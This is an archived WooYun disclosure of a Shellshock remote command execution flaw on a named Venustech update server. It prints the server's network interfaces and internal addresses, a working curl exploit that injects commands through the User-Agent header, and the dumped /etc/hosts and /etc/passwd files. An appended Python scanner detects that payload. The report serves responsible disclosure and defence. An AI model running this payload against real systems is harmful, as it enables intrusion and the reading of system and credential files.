WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
2016-01-18: Details reported to the vendor, awaiting vendor handling
2016-01-20: Vendor confirmed the issue; details disclosed to the vendor only
2016-01-30: Details disclosed to core white hats and experts in related fields
2016-02-09: Details disclosed to ordinary white hats
2016-02-19: Details disclosed to intern white hats
2016-03-05: Details disclosed to the public
A Venustech server has a remote command execution vulnerability; the server has 4 network cards and is configured with internal IP addresses on 7 class-C segments
#1 Server
https://updates.venustech.com.cn/
#2 Vulnerability description
Bash Shellshock vulnerability
ifconfig output on the server:

eth2      Link encap:Ethernet  HWaddr 00:e0:4c:50:29:28
          inet addr:124.207.17.66  Bcast:124.207.17.67  Mask:255.255.255.252
          inet6 addr: fe80::2e0:4cff:fe50:2928/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:509587196 errors:0 dropped:150 overruns:0 frame:0
          TX packets:447431051 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:477215383114 (444.4 GiB)  TX bytes:102776363246 (95.7 GiB)
          Interrupt:18 Memory:d0200000-d0220000

eth3      Link encap:Ethernet  HWaddr 00:e0:4c:50:29:29
          inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2753536727 errors:0 dropped:6301 overruns:0 frame:0
          TX packets:2704033675 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2398944004498 (2.1 TiB)  TX bytes:2645235946740 (2.4 TiB)
          Interrupt:19 Memory:d0300000-d0320000

eth5      Link encap:Ethernet  HWaddr 00:e0:4c:50:29:2b
          inet addr:192.168.99.1  Bcast:192.168.99.255  Mask:255.255.255.0
          inet6 addr: fe80::2e0:4cff:fe50:292b/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2775236580 errors:0 dropped:1087224 overruns:0 frame:0
          TX packets:168683223 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:215766978251 (200.9 GiB)  TX bytes:159408116401 (148.4 GiB)
          Interrupt:17 Memory:d0500000-d0520000

eth3.2    Link encap:Ethernet  HWaddr 00:e0:4c:50:29:29
          inet addr:192.168.7.1  Bcast:192.168.7.255  Mask:255.255.255.0
          inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:139999170 errors:0 dropped:0 overruns:0 frame:0
          TX packets:178749034 errors:0 dropped:49 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:24650666919 (22.9 GiB)  TX bytes:196673483318 (183.1 GiB)

eth3.3    Link encap:Ethernet  HWaddr 00:e0:4c:50:29:29
          inet addr:192.168.5.1  Bcast:192.168.5.255  Mask:255.255.255.0
          inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:827207656 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1659932700 errors:0 dropped:441 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:71391019200 (66.4 GiB)  TX bytes:2305127162311 (2.0 TiB)

eth3.4    Link encap:Ethernet  HWaddr 00:e0:4c:50:29:29
          inet addr:192.168.9.97  Bcast:192.168.9.127  Mask:255.255.255.224
          inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:38196894 errors:0 dropped:0 overruns:0 frame:0
          TX packets:32701192 errors:0 dropped:546 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:38057682408 (35.4 GiB)  TX bytes:21081238644 (19.6 GiB)

eth3.5    Link encap:Ethernet  HWaddr 00:e0:4c:50:29:29
          inet addr:192.168.8.1  Bcast:192.168.8.255  Mask:255.255.255.0
          inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:12150050 errors:0 dropped:0 overruns:0 frame:0
          TX packets:15849901 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:2263388346 (2.1 GiB)  TX bytes:15154916440 (14.1 GiB)

eth3.6    Link encap:Ethernet  HWaddr 00:e0:4c:50:29:29
          inet addr:192.168.10.1  Bcast:192.168.10.255  Mask:255.255.255.0
          inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:96227890 errors:0 dropped:0 overruns:0 frame:0
          TX packets:7267281 errors:0 dropped:39 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:8879882984 (8.2 GiB)  TX bytes:7411205232 (6.9 GiB)

eth3.7    Link encap:Ethernet  HWaddr 00:e0:4c:50:29:29
          inet addr:192.168.9.1  Bcast:192.168.9.31  Mask:255.255.255.224
          inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1639751756 errors:0 dropped:0 overruns:0 frame:0
          TX packets:809504545 errors:0 dropped:21 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:2215151596571 (2.0 TiB)  TX bytes:99786721439 (92.9 GiB)

eth3.8    Link encap:Ethernet  HWaddr 00:e0:4c:50:29:29
          inet addr:124.207.17.69  Bcast:124.207.17.71  Mask:255.255.255.252
          inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:3311 errors:0 dropped:0 overruns:0 frame:0
          TX packets:29016 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:253892 (247.9 KiB)  TX bytes:1218888 (1.1 MiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:86767 errors:0 dropped:0 overruns:0 frame:0
          TX packets:86767 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:113560276 (108.2 MiB)  TX bytes:113560276 (108.2 MiB)
#3 Proof
curl cgi-url -A "() { foo;};echo;/bin/cat /etc/hosts" -k

Returned /etc/hosts:

# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost USAP
192.168.9.125 update.lyxtech.com
cat /etc/passwd

admin:x:0:0:root:/usap/boot:/bin/bash
daemon:x:1:1:daemon:/usr/local/usap/center/bin:/bin/nologin
www:x:33:33:www:/usr/local/usap/center/web:/bin/nologin
sshd:x:74:74::/var/sshd:/sbin/nologin
ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false
mysql:x:500:500::/home/mysql:/sbin/nologin
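As an added, defensive example that is not part of the original report: a Python scan over constructed lighttpd-style access-log lines that flags the Shellshock function-definition prefix in the User-Agent or Referer header (the carrier used by the curl PoC above) and marks whether the target was a CGI path. The combined log layout and the sample addresses are assumptions.

```python
import re
from typing import Dict, List

# Shellshock payloads begin with a bash function definition, "() {", sent in an
# HTTP header that the CGI handler exports into the environment; the PoC above
# puts it in User-Agent (curl -A). The regex tolerates whitespace variants.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Combined log format (lighttpd/Apache style); assumed layout for this example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (not real traffic from the report); the second one
# carries the header string used in the PoC above.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Jan/2016:18:20:01 +0800] "GET /login.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Jan/2016:18:22:13 +0800] "GET /login.cgi HTTP/1.1" 200 233 "-" "() { foo;};echo;/bin/cat /etc/hosts"
192.0.2.10 - - [18/Jan/2016:18:23:40 +0800] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/7.35.0"
"""


def is_cgi_request(request_line: str) -> bool:
    """True when the request path points at a CGI script (e.g. /login.cgi)."""
    parts = request_line.split()
    return len(parts) >= 2 and ".cgi" in parts[1].lower()


def find_shellshock_attempts(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per header value carrying the Shellshock prefix."""
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        for header in ("ua", "referer"):
            if SHELLSHOCK_RE.search(m.group(header)):
                hits.append({
                    "ip": m.group("ip"), "time": m.group("ts"),
                    "request": m.group("req"), "header": header,
                    "cgi": "yes" if is_cgi_request(m.group("req")) else "no",
                })
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(hit)
```

A hit against a CGI path on a host whose bash is unpatched is the case this report describes; the same scan run over historical logs shows whether the PoC header was ever sent before the server was taken offline.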
Update it or take it offline.
Severity: High
Vulnerability rank: 10
Confirmed at: 2016-01-20 17:58
This is a third-party vendor's system that was previously in a testing state and had not been formally put into service. Testing confirmed the problem exists; it has now been taken offline and we are contacting the third-party vendor for a fix. Many thanks to 猪猪侠.
None yet.